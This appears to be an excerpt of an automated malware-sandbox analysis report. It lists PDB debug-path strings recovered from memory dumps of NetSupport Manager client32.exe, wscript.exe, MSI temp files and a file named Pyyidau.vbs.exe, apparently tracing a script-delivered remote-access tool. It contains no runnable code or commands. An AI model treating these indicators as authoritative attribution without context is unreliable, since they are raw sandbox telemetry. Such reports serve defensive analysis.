                                Source: Binary string: msvcp_win.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdbD= source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wininet.pdbQ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\DllWrap.pdb source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.dr
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pciinv\Release_unicode\pciinv.pdb@ source: client32.exe, 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, client32.exe, 00000028.00000002.2769152495.000000006C860000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: srvcli.pdb4; source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: DisableGeolocationEnableStopClientpcicl32.pdbSSLDefCertrootcert.pemSSLCertDirRootCertsshareFilecic/setup.msicic/setup.execic/delta.zipCICshareVershareTypeInstalledBytracerecvtracesendNoAckWhenInRoomlimitcolorbitsWinHttpWiredNetworkSpeedWebSocketSSLOnlySSLDisconnectTimeoutSilentImageFilecic_lock_image.jpgImpersonateCurrentUserdetected TS feature source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pciinv\Release_unicode\pciinv.pdb( source: client32.exe, 00000026.00000002.2708076762.0000000004E90000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msimg32.pdbr$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msimg32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2770498000.000000006F91A000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\client32\release_unicode\PCICL32.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr
                                Source: Binary string: wUxTheme.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: cscapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mpr.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d11.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dbghelp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\StoreInvDll\Release\StoreInvDll.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, client32.exe, 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: WindowsCodecs.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32full.pdb source: client32.exe, 00000026.00000003.2696801013.0000000007680000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sechost.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\DLL\wkernel32.pdb source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\PCICTL.pdb source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: wmiclnt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: propsys.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxgi.pdbY source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: fastprox.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemsvc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powrprof.pdbV$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msctf.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: linkinfo.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernel32.pdbtem32\wkernel32.pdbNetSupport Manager\symbols\DLL\wkernel32.pdbMI source: client32.exe, 00000026.00000002.2707856987.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: gwkernelbase.pdb source: client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbk source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: linkinfo.pdb ; source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: netapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: bcryptprimitives.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Amsi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbp source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: jE:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\SysWOW64\ntdll.dllernel32.pdbdbm source: client32.exe, 00000026.00000002.2711261491.000000000713C000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: dxgi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wuser32.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernelbase.pdbO source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winsta.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: bcrypt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemcomn.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: "Physical Memory"tem32\wkernelbase.pdb source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpJD source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wrpcrt4.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemcomn.pdbB$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcp100.i386.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb` source: client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: CLBCatQ.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernelbase.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shlwapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: TextShaping.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d12.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: NETSUPPORT LTD.NetSupport Ltd.url.pdb.dllpreprocessing %s source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbhGR source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\cryptpak\Release\CryptPak.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2769411923.000000006CBDE000.00000002.00000001.01000000.0000001A.sdmp
                                Source: Binary string: riched20.pdbx$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbE2G source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: adsldpc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc.pdb\$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: srvcli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbpdblient32.pdbro source: client32.exe, 00000026.00000002.2707856987.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pciinv\Release_unicode\pciinv.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2708076762.0000000004E90000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, client32.exe, 00000028.00000002.2769152495.000000006C860000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: profapi.pdb.; source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: iphlpapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbUGP source: pcicfgui_client.exe, 00000024.00000002.2673326583.00000000026C0000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 00000028.00000003.2750993608.0000000007200000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2801948506.0000000008B90000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: iphlpapi.pdb`$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000023.00000000.2645950640.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701499634.0000000004EEA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000000.2666385181.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000026.00000002.2702240534.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp, client32.exe, 00000028.00000000.2728490909.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 00000028.00000002.2757688060.0000000000732000.00000002.00000001.01000000.00000014.sdmp, client32.exe, 0000002D.00000000.2778639496.0000000000732000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb\*D{ source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\dll\wkernelbase.pdbG source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\Release_unicode\PCICFGUI.pdb source: pcicfgui_client.exe, 00000024.00000000.2661196429.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, pcicfgui_client.exe, 00000024.00000002.2673004138.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, pcicfgui_client.exe, 00000025.00000002.2666174324.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: wkernel32.pdbbJdSo@ source: client32.exe, 00000026.00000002.2711261491.000000000713C000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: userenv.pdb_ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: nsi.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wimm32.pdbi source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Kernel.Appcore.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\StoreInvDll\Release\StoreInvDll.pdb source: client32.exe, 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, client32.exe, 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: msls31.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: secur32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000003.00000000.1717706981.0000000000271000.00000020.00000001.01000000.00000005.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb] source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: netutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: tapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wrpcrt4.pdbx source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: npciinv.pdbd source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: shlwapi.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: wwin32u.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched20.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\pciinv.pdb G source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sechost.pdb9 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Amsi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpOD source: MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: cryptsp.pdbZ$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dnsapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: userenv.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wimm32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wwin32u.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: setupapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winhttp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxdiagn.pdbn$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: devobj.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: gdiplus.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: rtutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: profapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: opciinvclient32.pdbwkernel32.pdb\Program Files (x86)\NetSupport\NetSupport Manager\Support ManagerD source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: |E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbpdblient32.pdb@ source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: WLDP.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdbG source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: setupapi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msxml6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: version.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: dbgcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wintrust.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ws2_32.pdb/ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdb2 source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Kernel.Appcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
